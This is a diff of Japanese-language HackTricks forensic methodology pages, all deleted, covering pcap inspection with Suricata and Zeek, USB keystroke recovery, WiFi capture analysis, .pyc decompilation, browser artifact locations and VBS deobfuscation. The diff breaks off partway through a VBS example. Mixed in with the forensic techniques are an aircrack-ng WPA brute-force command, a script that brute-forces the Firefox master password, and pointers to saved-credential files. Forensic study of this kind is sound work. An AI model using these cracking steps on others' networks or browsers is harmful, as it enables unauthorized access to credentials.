[https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz)のようなツールを使用して、pcapまたはライブインターフェースから認証情報を解析できます。
## エクスプロイト/マルウェアの確認
### Suricata
**インストールと設定**
```
apt-get install suricata
apt-get install oinkmaster
echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
```
**pcapを確認する**
```
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
```
### YaraPcap
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) は、次のことを行うツールです。
- PCAPファイルを読み取り、Httpストリームを抽出します。
- gzipは圧縮されたストリームを解凍します。
- すべてのファイルをyaraでスキャンします。
- report.txtを書き込みます。
- 一致するファイルをディレクトリに保存するオプションがあります。
### Malware Analysis
既知のマルウェアのフィンガープリントを見つけられるか確認してください:
{{#ref}}
../malware-analysis.md
{{#endref}}
## Zeek
> [Zeek](https://docs.zeek.org/en/master/about.html) は、受動的なオープンソースのネットワークトラフィックアナライザーです。多くのオペレーターは、疑わしいまたは悪意のある活動の調査をサポートするために、ZeekをネットワークセキュリティモニターNSMとして使用しています。Zeekは、セキュリティドメインを超えたパフォーマンス測定やトラブルシューティングを含む、幅広いトラフィック分析タスクもサポートしています。
基本的に、`zeek`によって作成されたログは**pcap**ではありません。したがって、**pcap**に関する**情報**を分析するために、**他のツール**を使用する必要があります。
### Connections Info
```bash
#Get info about longest connections (add "grep udp" to see only udp traffic)
#The longest connection might be of malware (constant reverse shell?)
cat conn.log | zeek-cut id.orig_h id.orig_p id.resp_h id.resp_p proto service duration | sort -nrk 7 | head -n 10
10.55.100.100 49778 65.52.108.225 443 tcp - 86222.365445
10.55.100.107 56099 111.221.29.113 443 tcp - 86220.126151
10.55.100.110 60168 40.77.229.82 443 tcp - 86160.119664
#Improve the metrics by summing up the total duration time for connections that have the same destination IP and Port.
cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p proto duration | awk 'BEGIN{ FS="\t" } { arr[$1 FS $2 FS $3 FS $4] += $5 } END{ for (key in arr) printf "%s%s%s\n", key, FS, arr[key] }' | sort -nrk 5 | head -n 10
10.55.100.100 65.52.108.225 443 tcp 86222.4
10.55.100.107 111.221.29.113 443 tcp 86220.1
10.55.100.110 40.77.229.82 443 tcp 86160.1
#Get the number of connections summed up per each line
cat conn.log | zeek-cut id.orig_h id.resp_h duration | awk 'BEGIN{ FS="\t" } { arr[$1 FS $2] += $3; count[$1 FS $2] += 1 } END{ for (key in arr) printf "%s%s%s%s%s\n", key, FS, count[key], FS, arr[key] }' | sort -nrk 4 | head -n 10
10.55.100.100 65.52.108.225 1 86222.4
10.55.100.107 111.221.29.113 1 86220.1
10.55.100.110 40.77.229.82 134 86160.1
#Check if any IP is connecting to 1.1.1.1
cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p proto service | grep '1.1.1.1' | sort | uniq -c
#Get number of connections per source IP, dest IP and dest Port
cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p proto | awk 'BEGIN{ FS="\t" } { arr[$1 FS $2 FS $3 FS $4] += 1 } END{ for (key in arr) printf "%s%s%s\n", key, FS, arr[key] }' | sort -nrk 5 | head -n 10
# RITA
#Something similar can be done with the tool rita
rita show-long-connections -H --limit 10 zeek_logs
+---------------+----------------+--------------------------+----------------+
| SOURCE IP | DESTINATION IP | DSTPORT:PROTOCOL:SERVICE | DURATION |
+---------------+----------------+--------------------------+----------------+
| 10.55.100.100 | 65.52.108.225 | 443:tcp:- | 23h57m2.3655s |
| 10.55.100.107 | 111.221.29.113 | 443:tcp:- | 23h57m0.1262s |
| 10.55.100.110 | 40.77.229.82 | 443:tcp:- | 23h56m0.1197s |
#Get connections info from rita
rita show-beacons zeek_logs | head -n 10
Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top Intvl,Top Size,Top Intvl Count,Top Size Count,Intvl Skew,Size Skew,Intvl Dispersion,Size Dispersion
1,192.168.88.2,165.227.88.15,108858,197,860,182,1,89,53341,108319,0,0,0,0
1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0
0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0
```
### DNS情報
```bash
#Get info about each DNS request performed
cat dns.log | zeek-cut -c id.orig_h query qtype_name answers
#Get the number of times each domain was requested and get the top 10
cat dns.log | zeek-cut query | sort | uniq | rev | cut -d '.' -f 1-2 | rev | sort | uniq -c | sort -nr | head -n 10
#Get all the IPs
cat dns.log | zeek-cut id.orig_h query | grep 'example\.com' | cut -f 1 | sort | uniq -c
#Sort the most common DNS record request (should be A)
cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
#See top DNS domain requested with rita
rita show-exploded-dns -H --limit 10 zeek_logs
```
## 他のpcap分析のトリック
{{#ref}}
dnscat-exfiltration.md
{{#endref}}
{{#ref}}
wifi-pcap-analysis.md
{{#endref}}
{{#ref}}
usb-keystrokes.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

14
src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md
View File

@ -1,14 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
USB接続のpcapに多くの中断がある場合、おそらくそれはUSBキーボード接続です。
このようなwiresharkフィルターが役立つかもしれません: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
「02」で始まるデータはシフトを使用して押されたことを知っておくことが重要です。
これを分析する方法についての情報やスクリプトを見つけることができます:
- [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
- [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
{{#include ../../../banners/hacktricks-training.md}}

17
src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
View File

@ -1,17 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
USB経由でキーボードの通信を含むpcapがある場合、次のようになります
![](<../../../images/image (613).png>)
ツール[**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser)を使用して、通信で書かれた内容を取得できます:
```bash
tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt
python3 usbkeyboard.py ./keystrokes.txt
```
この分析に関する詳細情報やスクリプトは、以下で読むことができます:
- [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
- [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
{{#include ../../../banners/hacktricks-training.md}}

39
src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
View File

@ -1,39 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
# BSSIDを確認する
WireSharkを使用してWifiの主なトラフィックをキャプチャした場合、_Wireless --> WLAN Traffic_でキャプチャのすべてのSSIDを調査し始めることができます
![](<../../../images/image (424).png>)
![](<../../../images/image (425).png>)
## ブルートフォース
その画面の列の1つは、**pcap内に認証が見つかったかどうか**を示しています。もしそうであれば、`aircrack-ng`を使用してブルートフォースを試みることができます:
```bash
aircrack-ng -w pwds-file.txt -b <BSSID> file.pcap
```
例えば、PSK事前共有キーを保護するWPAパスフレーズを取得し、後でトラフィックを復号化するために必要です。
# ビーコン内のデータ / サイドチャネル
**Wifiネットワークのビーコン内でデータが漏洩していると疑う場合**、次のようなフィルターを使用してネットワークのビーコンを確認できます: `wlan contains <NAMEofNETWORK>`、または `wlan.ssid == "NAMEofNETWORK"` フィルタリングされたパケット内で疑わしい文字列を検索します。
# Wifiネットワーク内の不明なMACアドレスを見つける
次のリンクは、**Wifiネットワーク内でデータを送信しているマシンを見つけるのに役立ちます**:
- `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2`
**MACアドレスが既にわかっている場合は、出力からそれらを削除できます**。次のようなチェックを追加します: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
ネットワーク内で通信している**不明なMAC**アドレスを検出したら、次のような**フィルター**を使用できます: `wlan.addr==<MAC address> && (ftp || http || ssh || telnet)` トラフィックをフィルタリングします。ftp/http/ssh/telnetフィルターは、トラフィックを復号化した場合に便利です。
# トラフィックを復号化する
Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
![](<../../../images/image (426).png>)
{{#include ../../../banners/hacktricks-training.md}}

202
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
View File

@ -1,202 +0,0 @@
# コンパイルされたPythonバイナリexe、elfを逆コンパイルする - .pycから取得
{{#include ../../../banners/hacktricks-training.md}}
## コンパイルされたバイナリから.pycへ
**ELF**コンパイルバイナリから**.pycを取得**するには:
```bash
pyi-archive_viewer <binary>
# The list of python modules will be given here:
[(0, 230, 311, 1, 'm', 'struct'),
(230, 1061, 1792, 1, 'm', 'pyimod01_os_path'),
(1291, 4071, 8907, 1, 'm', 'pyimod02_archive'),
(5362, 5609, 13152, 1, 'm', 'pyimod03_importers'),
(10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'),
(12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'),
(13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'),
(13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'),
(15090, 445, 672, 1, 's', 'pyi_rth_inspect'),
(15535, 2514, 4421, 1, 's', 'binary_name'),
...
? X binary_name
to filename? /tmp/binary.pyc
```
**python exe バイナリ** でコンパイルされた場合、次のコマンドを実行することで **.pyc** を取得できます:
```bash
python pyinstxtractor.py executable.exe
```
## From .pyc to python code
**.pyc**データ("コンパイルされた" pythonについては、**元の** **python** **コード**を**抽出**しようとすることから始めるべきです:
```bash
uncompyle6 binary.pyc > decompiled.py
```
**必ず**バイナリが**拡張子**「**.pyc**」を持っていることを確認してくださいそうでない場合、uncompyle6は機能しません
**uncompyle6**を実行していると、**以下のエラー**が発生することがあります:
### エラー: 不明なマジックナンバー 227
```bash
/kali/.local/bin/uncompyle6 /tmp/binary.pyc
Unknown magic number 227 in /tmp/binary.pyc
```
これを修正するには、生成されたファイルの先頭に**正しいマジックナンバー**を**追加する**必要があります。
**マジックナンバーはPythonのバージョンによって異なります**。**Python 3.8**のマジックナンバーを取得するには、**Python 3.8**のターミナルを**開いて実行する**必要があります。
```
>> import imp
>> imp.get_magic().hex()
'550d0d0a'
```
この場合のpython3.8の**マジックナンバー**は**`0x550d0d0a`**です。次に、このエラーを修正するには、**.pycファイル**の**先頭**に次のバイトを**追加**する必要があります: `0x0d550a0d000000000000000000000000`
**その後**、そのマジックヘッダーを**追加**すると、**エラーは修正されるはずです。**
正しく追加された**.pyc python3.8マジックヘッダー**は次のようになります:
```bash
hexdump 'binary.pyc' | head
0000000 0d55 0a0d 0000 0000 0000 0000 0000 0000
0000010 00e3 0000 0000 0000 0000 0000 0000 0000
0000020 0700 0000 4000 0000 7300 0132 0000 0064
0000030 0164 006c 005a 0064 0164 016c 015a 0064
```
### エラー: 汎用エラーの逆コンパイル
**他のエラー**として: `class 'AssertionError'>; co_code should be one of the types (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); is type <class 'NoneType'>` が表示されることがあります。
これはおそらく、**マジックナンバーを正しく追加していない**か、**正しいマジックナンバーを使用していない**ことを意味しますので、**正しいものを使用していることを確認してください**(または新しいものを試してください)。
前のエラーのドキュメントを確認してください。
## 自動ツール
[**python-exe-unpacker tool**](https://github.com/countercept/python-exe-unpacker) は、Pythonで書かれた実行可能ファイルの逆コンパイルとアンパックを支援するために設計された、いくつかのコミュニティで利用可能なツールの組み合わせとして機能します。特に、py2exeおよびpyinstallerで作成されたものに特化しています。これは、実行可能ファイルがPythonベースであるかどうかを特定するためのYARAルールを含み、作成ツールを確認します。
### ImportError: ファイル名: 'unpacked/malware_3.exe/**pycache**/archive.cpython-35.pyc' が存在しません
一般的な問題は、**unpy2exeまたはpyinstxtractorを使用したアンパックプロセス**の結果として不完全なPythonバイトコードファイルが発生し、その後**Pythonバイトコードバージョン番号が欠落しているためにuncompyle6によって認識されない**ことです。これに対処するために、必要なPythonバイトコードバージョン番号を追加するprependオプションが追加され、逆コンパイルプロセスを容易にします。
問題の例:
```python
# Error when attempting to decompile without the prepend option
test@test: uncompyle6 unpacked/malware_3.exe/archive.py
Traceback (most recent call last):
...
ImportError: File name: 'unpacked/malware_3.exe/__pycache__/archive.cpython-35.pyc' doesn't exist
```
```python
# Successful decompilation after using the prepend option
test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
[*] On Python 2.7
[+] Magic bytes are already appended.
# Successfully decompiled file
[+] Successfully decompiled.
```
## Pythonアセンブリの分析
前のステップに従ってpythonの「オリジナル」コードを抽出できなかった場合は、**アセンブリ**を**抽出**してみてください(ただし、**あまり説明的ではない**ので、**再度**オリジナルコードを抽出してみてください)。[ここ](https://bits.theorem.co/protecting-a-python-codebase/)で、_.pyc_ バイナリを**逆アセンブル**するための非常にシンプルなコードを見つけましたコードフローを理解するのは大変かもしれません。_.pyc_ がpython2のものであれば、python2を使用してください
```bash
>>> import dis
>>> import marshal
>>> import struct
>>> import imp
>>>
>>> with open('hello.pyc', 'r') as f: # Read the binary file
... magic = f.read(4)
... timestamp = f.read(4)
... code = f.read()
...
>>>
>>> # Unpack the structured content and un-marshal the code
>>> magic = struct.unpack('<H', magic[:2])
>>> timestamp = struct.unpack('<I', timestamp)
>>> code = marshal.loads(code)
>>> magic, timestamp, code
((62211,), (1425911959,), <code object <module> at 0x7fd54f90d5b0, file "hello.py", line 1>)
>>>
>>> # Verify if the magic number corresponds with the current python version
>>> struct.unpack('<H', imp.get_magic()[:2]) == magic
True
>>>
>>> # Disassemble the code object
>>> dis.disassemble(code)
1 0 LOAD_CONST 0 (<code object hello_world at 0x7f31b7240eb0, file "hello.py", line 1>)
3 MAKE_FUNCTION 0
6 STORE_NAME 0 (hello_world)
9 LOAD_CONST 1 (None)
12 RETURN_VALUE
>>>
>>> # Also disassemble that const being loaded (our function)
>>> dis.disassemble(code.co_consts[0])
2 0 LOAD_CONST 1 ('Hello {0}')
3 LOAD_ATTR 0 (format)
6 LOAD_FAST 0 (name)
9 CALL_FUNCTION 1
12 PRINT_ITEM
13 PRINT_NEWLINE
14 LOAD_CONST 0 (None)
17 RETURN_VALUE
```
## Pythonを実行可能ファイルに変換する
まず、payloadがpy2exeとPyInstallerでどのようにコンパイルされるかを示します。
### py2exeを使用してpayloadを作成するには
1. [http://www.py2exe.org/](http://www.py2exe.org) からpy2exeパッケージをインストールします。
2. payloadこの場合、hello.pyと名付けますには、図1のようなスクリプトを使用します。オプション「bundle_files」の値を1に設定すると、Pythonインタプリタを含むすべてが1つのexeにバンドルされます。
3. スクリプトが準備できたら、「python setup.py py2exe」というコマンドを発行します。これにより、図2のように実行可能ファイルが作成されます。
```python
from distutils.core import setup
import py2exe, sys, os
sys.argv.append('py2exe')
setup(
options = {'py2exe': {'bundle_files': 1}},
#windows = [{'script': "hello.py"}],
console = [{'script': "hello.py"}],
zipfile = None,
)
```
```bash
C:\Users\test\Desktop\test>python setup.py py2exe
running py2exe
*** searching for required modules ***
*** parsing results ***
*** finding dlls needed ***
*** create binaries ***
*** byte compile python files ***
*** copy extensions ***
*** copy dlls ***
copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe
Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe
```
### PyInstallerを使用してペイロードを作成するには
1. pipを使用してPyInstallerをインストールしますpip install pyinstaller
2. その後、「pyinstaller onefile hello.py」というコマンドを発行しますhello.pyは私たちのペイロードです。これにより、すべてが1つの実行可能ファイルにバンドルされます。
```
C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
108 INFO: PyInstaller: 3.3.1
108 INFO: Python: 2.7.14
108 INFO: Platform: Windows-10-10.0.16299
………………………………
5967 INFO: checking EXE
5967 INFO: Building EXE because out00-EXE.toc is non existent
5982 INFO: Building EXE from out00-EXE.toc
5982 INFO: Appending archive to EXE C:\Users\test\Desktop\test\dist\hello.exe
6325 INFO: Building EXE from out00-EXE.toc completed successfully.
```
## 参考文献
- [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
{{#include ../../../banners/hacktricks-training.md}}

41
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
View File

@ -1,41 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
ここでは、特定のファイルタイプおよび/またはソフトウェアに関する興味深いトリックを見つけることができます:
{{#ref}}
.pyc.md
{{#endref}}
{{#ref}}
browser-artifacts.md
{{#endref}}
{{#ref}}
desofuscation-vbs-cscript.exe.md
{{#endref}}
{{#ref}}
local-cloud-storage.md
{{#endref}}
{{#ref}}
office-file-analysis.md
{{#endref}}
{{#ref}}
pdf-file-analysis.md
{{#endref}}
{{#ref}}
png-tricks.md
{{#endref}}
{{#ref}}
video-and-audio-file-analysis.md
{{#endref}}
{{#ref}}
zips-tricks.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

162
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
View File

@ -1,162 +0,0 @@
# ブラウザのアーティファクト
{{#include ../../../banners/hacktricks-training.md}}
## ブラウザのアーティファクト <a href="#id-3def" id="id-3def"></a>
ブラウザのアーティファクトには、ナビゲーション履歴、ブックマーク、キャッシュデータなど、ウェブブラウザによって保存されるさまざまな種類のデータが含まれます。これらのアーティファクトは、オペレーティングシステム内の特定のフォルダーに保存され、ブラウザごとに場所や名前が異なりますが、一般的には同様のデータタイプを保存しています。
最も一般的なブラウザのアーティファクトの概要は次のとおりです:
- **ナビゲーション履歴**:ユーザーが訪れたウェブサイトを追跡し、悪意のあるサイトへの訪問を特定するのに役立ちます。
- **オートコンプリートデータ**:頻繁な検索に基づく提案で、ナビゲーション履歴と組み合わせることで洞察を提供します。
- **ブックマーク**:ユーザーが迅速にアクセスするために保存したサイト。
- **拡張機能とアドオン**:ユーザーがインストールしたブラウザの拡張機能やアドオン。
- **キャッシュ**ウェブコンテンツ画像、JavaScriptファイルを保存し、ウェブサイトの読み込み時間を改善します。法医学的分析にとって価値があります。
- **ログイン情報**:保存されたログイン資格情報。
- **ファビコン**:ウェブサイトに関連付けられたアイコンで、タブやブックマークに表示され、ユーザーの訪問に関する追加情報に役立ちます。
- **ブラウザセッション**:開いているブラウザセッションに関連するデータ。
- **ダウンロード**:ブラウザを通じてダウンロードされたファイルの記録。
- **フォームデータ**:ウェブフォームに入力された情報で、将来のオートフィル提案のために保存されます。
- **サムネイル**:ウェブサイトのプレビュー画像。
- **Custom Dictionary.txt**:ユーザーがブラウザの辞書に追加した単語。
## Firefox
Firefoxは、ユーザーデータをプロファイル内に整理し、オペレーティングシステムに基づいて特定の場所に保存します
- **Linux**: `~/.mozilla/firefox/`
- **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/`
- **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\`
これらのディレクトリ内の`profiles.ini`ファイルには、ユーザープロファイルがリストされています。各プロファイルのデータは、`profiles.ini`内の`Path`変数に名前が付けられたフォルダーに保存され、`profiles.ini`自体と同じディレクトリにあります。プロファイルのフォルダーが欠けている場合、それは削除された可能性があります。
各プロファイルフォルダー内には、いくつかの重要なファイルがあります:
- **places.sqlite**履歴、ブックマーク、ダウンロードを保存します。Windows上の[BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html)のようなツールで履歴データにアクセスできます。
- 特定のSQLクエリを使用して履歴とダウンロード情報を抽出します。
- **bookmarkbackups**:ブックマークのバックアップを含みます。
- **formhistory.sqlite**:ウェブフォームデータを保存します。
- **handlers.json**:プロトコルハンドラーを管理します。
- **persdict.dat**:カスタム辞書の単語。
- **addons.json**および**extensions.sqlite**:インストールされたアドオンと拡張機能に関する情報。
- **cookies.sqlite**クッキーの保存、Windows上での検査には[MZCookiesView](https://www.nirsoft.net/utils/mzcv.html)が利用可能です。
- **cache2/entries**または**startupCache**:キャッシュデータで、[MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html)のようなツールを通じてアクセスできます。
- **favicons.sqlite**:ファビコンを保存します。
- **prefs.js**:ユーザー設定と好み。
- **downloads.sqlite**古いダウンロードデータベースで、現在はplaces.sqliteに統合されています。
- **thumbnails**:ウェブサイトのサムネイル。
- **logins.json**:暗号化されたログイン情報。
- **key4.db**または**key3.db**:機密情報を保護するための暗号化キーを保存します。
さらに、ブラウザのフィッシング対策設定を確認するには、`prefs.js`内の`browser.safebrowsing`エントリを検索し、安全なブラウジング機能が有効または無効になっているかを示します。
マスターパスワードを解読しようとする場合は、[https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)を使用できます。\
次のスクリプトと呼び出しを使用して、ブルートフォースするパスワードファイルを指定できます:
```bash:brute.sh
#!/bin/bash
#./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:"
passfile=$1
while read pass; do
echo "Trying $pass"
echo "$pass" | python firefox_decrypt.py
done < $passfile
```
![](<../../../images/image (417).png>)
## Google Chrome
Google Chromeは、オペレーティングシステムに基づいて特定の場所にユーザープロファイルを保存します
- **Linux**: `~/.config/google-chrome/`
- **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\`
- **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/`
これらのディレクトリ内では、ほとんどのユーザーデータが**Default/**または**ChromeDefaultData/**フォルダーに見つかります。以下のファイルは重要なデータを保持しています:
- **History**: URL、ダウンロード、検索キーワードを含みます。Windowsでは、[ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html)を使用して履歴を読むことができます。「Transition Type」列には、リンクのクリック、入力されたURL、フォームの送信、ページの再読み込みなど、さまざまな意味があります。
- **Cookies**: クッキーを保存します。検査には、[ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html)が利用可能です。
- **Cache**: キャッシュデータを保持します。検査するには、Windowsユーザーは[ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html)を利用できます。
- **Bookmarks**: ユーザーのブックマーク。
- **Web Data**: フォーム履歴を含みます。
- **Favicons**: ウェブサイトのファビコンを保存します。
- **Login Data**: ユーザー名やパスワードなどのログイン資格情報を含みます。
- **Current Session**/**Current Tabs**: 現在のブラウジングセッションとオープンタブに関するデータ。
- **Last Session**/**Last Tabs**: Chromeが閉じられる前の最後のセッション中にアクティブだったサイトに関する情報。
- **Extensions**: ブラウザ拡張機能やアドオンのディレクトリ。
- **Thumbnails**: ウェブサイトのサムネイルを保存します。
- **Preferences**: プラグイン、拡張機能、ポップアップ、通知などの設定を含む情報が豊富なファイル。
- **Browsers built-in anti-phishing**: 反フィッシングおよびマルウェア保護が有効かどうかを確認するには、`grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`を実行します。出力に`{"enabled: true,"}`を探します。
## **SQLite DB Data Recovery**
前のセクションで観察できるように、ChromeとFirefoxの両方が**SQLite**データベースを使用してデータを保存しています。**削除されたエントリを回復することが可能です** [**sqlparse**](https://github.com/padfoot999/sqlparse) **または** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases)を使用します。
## **Internet Explorer 11**
Internet Explorer 11は、データとメタデータをさまざまな場所で管理し、保存された情報とその対応する詳細を分離して簡単にアクセスおよび管理できるようにします。
### Metadata Storage
Internet Explorerのメタデータは、`%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data`に保存されますVXはV01、V16、またはV24です。これに伴い、`V01.log`ファイルは`WebcacheVX.data`との修正時間の不一致を示す場合があり、`esentutl /r V01 /d`を使用して修復が必要です。このメタデータはESEデータベースに格納されており、photorecや[ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html)などのツールを使用して回復および検査できます。**Containers**テーブル内では、各データセグメントが保存されている特定のテーブルやコンテナを識別でき、Skypeなどの他のMicrosoftツールのキャッシュ詳細も含まれています。
### Cache Inspection
[IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html)ツールを使用すると、キャッシュの検査が可能で、キャッシュデータ抽出フォルダーの場所が必要です。キャッシュのメタデータには、ファイル名、ディレクトリ、アクセス回数、URLの起源、キャッシュ作成、アクセス、修正、期限切れのタイムスタンプが含まれます。
### Cookies Management
クッキーは[IECookiesView](https://www.nirsoft.net/utils/iecookies.html)を使用して探索でき、メタデータには名前、URL、アクセス回数、さまざまな時間関連の詳細が含まれます。永続的なクッキーは`%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`に保存され、セッションクッキーはメモリに存在します。
### Download Details
ダウンロードのメタデータは[ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html)を介してアクセス可能で、特定のコンテナにはURL、ファイルタイプ、ダウンロード場所などのデータが保持されています。物理ファイルは`%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`に見つかります。
### Browsing History
ブラウジング履歴を確認するには、[BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html)を使用し、抽出された履歴ファイルの場所とInternet Explorerの設定が必要です。ここでのメタデータには、修正およびアクセス時間、アクセス回数が含まれます。履歴ファイルは`%userprofile%\Appdata\Local\Microsoft\Windows\History`にあります。
### Typed URLs
入力されたURLとその使用時間は、レジストリの`NTUSER.DAT`内の`Software\Microsoft\InternetExplorer\TypedURLs`および`Software\Microsoft\InternetExplorer\TypedURLsTime`に保存され、ユーザーが入力した最後の50のURLとその最後の入力時間を追跡します。
## Microsoft Edge
Microsoft Edgeは、ユーザーデータを`%userprofile%\Appdata\Local\Packages`に保存します。さまざまなデータタイプのパスは次のとおりです:
- **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
- **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
- **Settings, Bookmarks, and Reading List**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb`
- **Cache**: `C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache`
- **Last Active Sessions**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active`
## Safari
Safariデータは`/Users/$User/Library/Safari`に保存されます。主なファイルは次のとおりです:
- **History.db**: `history_visits`および`history_items`テーブルにURLと訪問タイムスタンプが含まれています。`sqlite3`を使用してクエリを実行します。
- **Downloads.plist**: ダウンロードされたファイルに関する情報。
- **Bookmarks.plist**: ブックマークされたURLを保存します。
- **TopSites.plist**: 最も頻繁に訪問されたサイト。
- **Extensions.plist**: Safariブラウザ拡張機能のリスト。`plutil`または`pluginkit`を使用して取得します。
- **UserNotificationPermissions.plist**: プッシュ通知を許可されたドメイン。`plutil`を使用して解析します。
- **LastSession.plist**: 最後のセッションのタブ。`plutil`を使用して解析します。
- **Browsers built-in anti-phishing**: `defaults read com.apple.Safari WarnAboutFraudulentWebsites`を使用して確認します。1の応答は機能がアクティブであることを示します。
## Opera
Operaのデータは`/Users/$USER/Library/Application Support/com.operasoftware.Opera`にあり、履歴とダウンロードの形式はChromeと共有されています。
- **Browsers built-in anti-phishing**: `grep`を使用してPreferencesファイル内の`fraud_protection_enabled``true`に設定されているか確認します。
これらのパスとコマンドは、さまざまなウェブブラウザによって保存されたブラウジングデータにアクセスし、理解するために重要です。
## References
- [https://nasbench.medium.com/web-browsers-forensics-7e99940c579a](https://nasbench.medium.com/web-browsers-forensics-7e99940c579a)
- [https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/](https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/)
- [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file)
- **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123**
{{#include ../../../banners/hacktricks-training.md}}

42
src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
View File

@ -1,42 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
悪意のあるVBSファイルをデバッグ/デオブフスケートするのに役立ついくつかのこと:
## echo
```bash
Wscript.Echo "Like this?"
```
## コメント
```bash
' this is a comment
```
## テスト
```bash
cscript.exe file.vbs
```
## ファイルにデータを書き込む
```js
Function writeBinary(strBinary, strPath)
Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
' below lines purpose: checks that write access is possible!
Dim oTxtStream
On Error Resume Next
Set oTxtStream = oFSO.createTextFile(strPath)
If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
On Error GoTo 0
Set oTxtStream = Nothing
